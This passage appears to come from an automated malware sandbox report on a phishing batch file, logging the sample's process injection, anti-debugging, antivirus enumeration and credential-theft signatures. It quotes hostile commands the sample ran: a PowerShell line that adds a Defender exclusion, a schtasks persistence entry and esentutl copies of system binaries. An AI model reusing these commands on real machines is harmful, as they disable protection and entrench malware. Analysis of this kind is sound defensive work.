Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99555
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99394
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99226
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99059
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98628
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98223
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98056
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97817
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97245
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97005
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96861
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96702
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96591
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96480
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96263
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96151
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96032
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95904
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95794
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95685
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95576
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95467
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95357
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95248
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95139
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95019
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94899
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94639
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94495
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94283
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94154
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94044
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93931
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93717
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93607
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199422
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199202
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99757
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99528
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99420
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99310
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99091
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98764
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98654
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98545
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98436
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98210
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97967
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97824
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97611
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97483
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97372
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97260
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97153
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97045
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96936
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96826
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96716
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96608
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96389
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96280
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96170
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96061
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95951
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95842
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95733
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95620
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95514
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95405
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95295
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95165
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95027
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94906
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94527
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94420
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94311
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94202
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94092
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93872
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wisrysxl.PIF, 0000001A.00000002.1591107014.00000000008DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy90
Source: neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Wisrysxl.PIF API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 4_2_02E5F744
Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02E5894C
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 12_1_004BF794 mov eax, dword ptr fs:[00000030h] 12_1_004BF794
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 28_1_004BF794 mov eax, dword ptr fs:[00000030h] 28_1_004BF794
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process token adjusted: Debug
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 12_1_004015D7 SetUnhandledExceptionFilter, 12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 28_1_004015D7 SetUnhandledExceptionFilter, 28_1_004015D7
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2E1008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 352008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 290008
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 4_2_02E45ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 4_2_02E4A7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 4_2_02E45BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 4_2_02E4A810
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 32_2_02EE5ACC
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 32_2_02EE5BD7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: GetLocaleInfoA, 32_2_02EEA810
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4920C GetLocalTime, 4_2_02E4920C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4B78C GetVersionExA, 4_2_02E4B78C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
